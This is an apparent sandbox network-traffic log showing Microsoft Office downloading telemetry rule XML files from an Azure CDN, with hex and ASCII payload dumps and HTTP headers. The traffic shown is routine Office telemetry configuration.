                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                              Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                              Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                              Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                              Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                              Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                              Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              1192.168.2.46371813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:55 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 450
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                              x-ms-request-id: a3e6b75e-301e-000c-5a08-2c323f000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061555Z-16ccfc49897nrfsvhC1DFW8e0000000001q000000000k5za
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              2192.168.2.46371713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:55 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 3788
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                              x-ms-request-id: a28262d6-f01e-0003-5708-2c4453000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061555Z-16dc884887bbfwjkhC1DFWyza800000001m000000000bx66
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              3192.168.2.46371913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:55 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 2980
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                              x-ms-request-id: 9d856691-501e-0035-564e-2cc923000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061555Z-176bd8f9bc55l2dfhC1DFWw03w00000001t0000000003rpc
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              4192.168.2.46372013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:55 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                              x-ms-request-id: 1b669881-b01e-0097-6d1e-2c4f33000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061555Z-r159446fcd7bn5c7hC1DFWbnyg0000000120000000001g0g
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              5192.168.2.46372113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:55 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 2160
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                              x-ms-request-id: 07004fc3-001e-0028-6c2f-2cc49f000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061555Z-r159446fcd7xfscrhC1DFWamb000000000z000000000a0bq
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:55 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              6192.168.2.46372413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:56 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                              x-ms-request-id: 1f907120-801e-0047-71ae-2b7265000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061556Z-16ccfc49897rwhbvhC1DFWx88g00000001f000000000pkq0
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
